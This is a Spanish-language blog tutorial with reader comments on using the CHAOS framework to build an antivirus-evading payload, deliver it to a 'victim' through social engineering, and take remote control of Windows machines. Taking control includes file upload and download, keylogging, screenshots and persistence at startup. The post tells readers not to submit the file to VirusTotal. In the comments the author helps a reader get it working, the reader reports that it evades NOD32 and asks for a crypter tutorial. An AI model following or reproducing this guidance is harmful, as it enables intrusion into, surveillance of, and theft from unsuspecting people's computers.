Descarga tu guía de trucos informáticos aquí
Hackear Windows 7,8 y 10 con Framework CHAOS
Hackear Windows 7,8 y 10 con Framework CHAOS

Hackear Windows 7/8/10 con Framework CHAOS

CHAOS es un framework basado en Linux a través del cual puede generar fácilmente payloads y controlar máquinas remotas como Windows XP/Vista/7/8/8.1/10.

En otros palabras, se puede decir que CHAOS Framework es la versión mínima del METASPLOIT FRAMEWORK, porque tiene funciones limitadas que puede realizar con su objetivo, pero lo mejor de CHAOS Framework es que la carga útil (payload) que generará es 100% FUD (Totalmente indetectable).

ADVERTENCIA

PUEDE UTILIZAR ESTE SOFTWARE BAJO SU PROPIO RIESGO. LOS DESARROLLADORES Y ESTE BLOG NO ASUMEN NINGUNA RESPONSABILIDAD.

1. Características del Framework CHAOS

  • Usted puede controlar cualquier máquina de Windows de forma remota.
  • Puede descargar y/o cargar fácilmente cualquier archivo.
  • Incluso puede hacer que su sesión sea permanente al poner su carga en el inicio de Windows.
  • Obtenga los detalles del sistema operativo con un solo comando.
  • Usted puede incluso jugarle algunas bromas a su objetivo, tales como abrir cualquier URL, o ejecutar la bomba fork, etc.


2. Instalación del Framework CHAOS

  • Para instalar este framework, primero debe descargar dos paquetes que puede descargar fácilmente desde el repositorio de Kali Linux escribiendo el siguiente comando:
apt install golang upx-ucl -y

El comando anterior instalará los paquetes Golang y UPX en tu máquina Kali Linux. Mejor aún, instale otro requerimientos faltantes:

go get github.com/kbinani/screenshot
go install github.com/kbinani/screenshot
  • Ahora el siguiente paso es instalar el framework CHAOS que está disponible en Github.
git clone https://github.com/tiagorlampert/CHAOS.git
Instalar Framework CHAOS
Instalar Framework CHAOS
  • Después de eso, solo ingrese al directorio CHAOS y ejecute el siguiente comando para ejecutar CHAOS:
cd CHAOS
go run CHAOS.go
Iniciar Framework CHAOS
Iniciar Framework CHAOS

3. Preparación de CHAOS e Ingeniería Social

INFORMACIÓN

Para este ejemplo, he utilizado Kali Linux como máquina atacante y Windows 10 como máquina objetivo. Misma Red.
  • Una vez ejecutado CHAOS, escriba 1 para generar la carga útil y luego le pedirá cierta información sobre la carga útil, como LHOST/ LPORT/FILENAME, etc.
Generate Payload CHAOS
Generate Payload en CHAOS

Coloca tu dirección IP de la interfaz Ethernet en LHOST y para LPORT, puede usar cualquier puerto, en este caso usaré 8080.

LHOST, LPORT, FILENAME en CHAOS
LHOST, LPORT, FILENAME en CHAOS
  • Ahora en el siguiente paso, le pedirá que escriba Y o N para comprimir su carga con UPX, le recomendamos que escriba n para no comprimir.
  • Además, le pedirá que inicie el Listener, presione Y e ingrese el mismo LPORT que utilizó anteriormente, es decir, 8080.
Iniciar Listener en CHAOS
Iniciar Listener en CHAOS
  • Ahora como puede ver, el archivo está listo en el directorio /root/CHAOS/ donde instaló CHAOS Framework. Use cualquier método de ingeniería social para enviar ese archivo a tu víctima/objetivo.
Carpeta personal CHAOS Framework
Carpeta personal de CHAOS Framework

4. Hacking Windows 7/8/10: Payload y Control Remoto


  • Obtendrás el estado: connected tan pronto como tu víctima ejecute el archivo como se muestra a continuación:
Estado connected Framework CHAOS
Estado: connected
  • Ahora escriba el siguiente comando para conocer la información relacionada con el sistema operativo:
getos
Comando getos en CHAOS
Comando getos en CHAOS
  • Escriba lo siguiente para enumerar todos los comandos que puede usar con CHAOS:
help
Comando help de ayuda
Comando help de ayuda
  • Para ver todos los archivos del directorio actual, escriba el siguiente comando:
dir
  • Si desea abrir cualquier URL aleatoria en la máquina objetivo, simplemente escriba:
openurl
Keylogger en Windows con Framework CHAOS
Keylogger y Screenshot en Windows con Framework CHAOS

5. Tutorial de CHAOS Framework

A continuación, te dejo un pequeño tutorial sobre la instalación uso de esta herramienta TOTALMENTE INDETECTABLE. Al menos hasta la fecha (Mayo 2018).

https://youtu.be/bYtR6cWyYXI

RECOMENDACIÓN

No subirlo a virus total

Hay algunas cosas más que se pueden lograr: Screenshot, Keylogger, Descargar/cargar fácilmente cualquier cosa con el comando download y upload. Si te ha gustado el artículo, no dudes en compartirlo con los demás 😉

  1. hermano soy nuevo en linux, instale ubunto 16.04 tls porque no tengo todavia kali. instale el CHAOS pero el payload que me genera es “payload”.go como CHAOS.go no es un .exe intente desintalarlo para instalarlo de nuevo pero no me deja . en la carpeta tiene un candadito pero quizas eso sea ya del ubuntu. ayudame y dime q pasa por favor. saludos

    1. Hola que tal!

      Ese problema suele suceder por falta de un requerimiento, me pasó al comienzo por el tema del screenshot (pese a que no lo iba a utilizar). Intente instalar lo siguiente:

      go get github.com/kbinani/screenshot && go get github.com/lxn/win
      go install github.com/kbinani/screenshot && go install github.com/lxn/win

      Me cuenta…

  2. hermano copie y pegue la primera linea de codigo y me puso esto:
    package github.com/kbinani/screenshot: cannot download, $GOPATH not set. For more details see: go help gopath
    estoy atento a tu explicacion. y lo hice todo como root. .saludos

    1. Uhm el problema es con $GOPATH…

      Intenta lo siguiente y me cuentas:
      export GOPATH=/go
      export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin

      Y a continuación:

      sudo go get github.com/kbinani/screenshot
      sudo go install github.com/kbinani/screenshot
      sudo go get github.com/lxn/win
      go install github.com/lxn/win

      Si te aparece un mensaje del tipo “can’t load package: package github.com/lxn/win: build constraints exclude all Go files in /home/alex/go/src/github.com/lxn/win” o “package github.com/lxn/win: no buildable Go source files in /home/alex/go/src/github.com/lxn/win“, lo omites. Y ya debería generar el EXE.

  3. hermano hice todo como me dijiste pero el resultado es el mismo :package github.com/kbinani/screenshot: cannot download, $GOPATH not set. For more details see: go help gopath. es como si no le hiciera caso a :
    export GOPATH=/go
    export PATH=$PATH:/usr/local/go/bin:$GOPATH/bin
    por ayudame. saludos.

    1. Que te muestra si ejecutas:

      mkdir ~/go

      ¿?(si dice que el directorio ya existe, lo anterior debería funcionar :/) Si no da error, continua:

      export GOPATH=~/go
      export PATH=$PATH:$GOPATH/bin

  4. hermano miralo tu mismo es como si no hiciera nada o sea al ingresar las path nuevos no pone nada oberva:
    root@anonymous:/home/cain# mkdir ~/go
    root@anonymous:/home/cain# export GOPATH=~/go
    root@anonymous:/home/cain# export PATH=$PATH:$GOPATH/bin
    root@anonymous:/home/cain# sudo go get github.com/kbinani/screenshot
    sudo: unable to resolve host anonymous
    package github.com/kbinani/screenshot: cannot download, $GOPATH not set. For more details see: go help gopath
    root@anonymous:/home/cain# sudo go install github.com/kbinani/screenshot
    sudo: unable to resolve host anonymous
    can’t load package: package github.com/kbinani/screenshot: cannot find package “github.com/kbinani/screenshot” in any of:
    /usr/lib/go-1.6/src/github.com/kbinani/screenshot (from $GOROOT)
    ($GOPATH not set)
    root@anonymous:/home/cain#

    ayudame. saludos.

    1. Fue un error mio en el primero tipeo para exportar el PATH, el comando debió ser así:
      export GOPATH=~/go
      export PATH=$PATH:$GOPATH/bin

      No es necesario crear el directorio porque ya está instalado. Una vez ejecutado ello, deberá funcionar 🙂

  5. He seguido todos los pasos, pero no me crea el acrchivo .exe, me crear unicamente el archivo .go, a que se puede deber? un saludo y muchas gracias por este aporte

  6. hermano al fin, al finnn. acaba de generar el .exe. aunque no veo la diferencia en el typeo q me dices. pero lo cierto es que al parecer instaló las dependencias faltantes no me puso barra de progreso solo salto a una nueva linea, luego con la otro dependencia . luego probe y nada luego reinicie y si lo lo asentó. no es detectable por el nod32 por lo menos, jajajaajaja. te mantengo informado d que tambien funciona. muchas gracias….. un abrazo

    1. Genial! Sí había diferencia jeje era el símbolo ~ para buscar el directorio /go y establecer la variable de entorno.
      Gracias a ti por informar que es indetectable por nod32. De hecho debería serlo en su mayoría si aún no se ha subido a VirusTotal.

      Saludos!

  7. Tranquilo hermano de ninguna manera se va a subir a ese sitio. sino para que tanta lucha, para soltar las armas ???. jajajaja. negativo. luego te cuento , no lo he probado todavía , lo deje ahí. muchas gracias por tomarte el trabajo de la explicación ya tengo un tutor para linux. estamos en contacto. hasta la próxima………

  8. hola hermano soy yo de nuevo, escucha probe el payload generado por CHAOS y escogí una pc de prueba de mi lab virtual y

    lo que sucede es que se queda esperando la conexion no ve la otra pc. lo cerré y volví a abrirlo y cuando escojo la

    opcion 2 (escucha) me genera este error: [*] Waiting for connection…
    panic: runtime error: invalid memory address or nil pointer dereference
    [signal 0xb code=0x1 addr=0x20 pc=0x4085e3]

    goroutine 1 [running]:
    panic(0x5a7240, 0xc82000a130)
    /usr/lib/go-1.6/src/runtime/panic.go:481 +0x3e6
    main.RunServer()
    /home/cain/CHAOS/CHAOS.go:306 +0xbf3
    main.ShowMenu()
    /home/cain/CHAOS/CHAOS.go:181 +0x1003
    main.main()
    /home/cain/CHAOS/CHAOS.go:34 +0x1e
    exit status 2
    root@anonymous:/home/cain/CHAOS#
    saludos espero puedas ayudarme.

  9. Escuha hermano, ya funciona e instale kali linux 2018.3 y me funciona como a ti y probado en el fuego, pero ahora escuha esto, hace unos dias lo empezo a detectar el nod32.
    enseñanos a usar algun kripter (has un tutoirial) para poder usarlo esta buenisimo no podemos abandonar el proyecto. un saludos y esperando respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Más artículos
Cómo bloquear y permitir aplicaciones para usuarios Windows
Cómo bloquear/permitir ciertas aplicaciones para usuarios Windows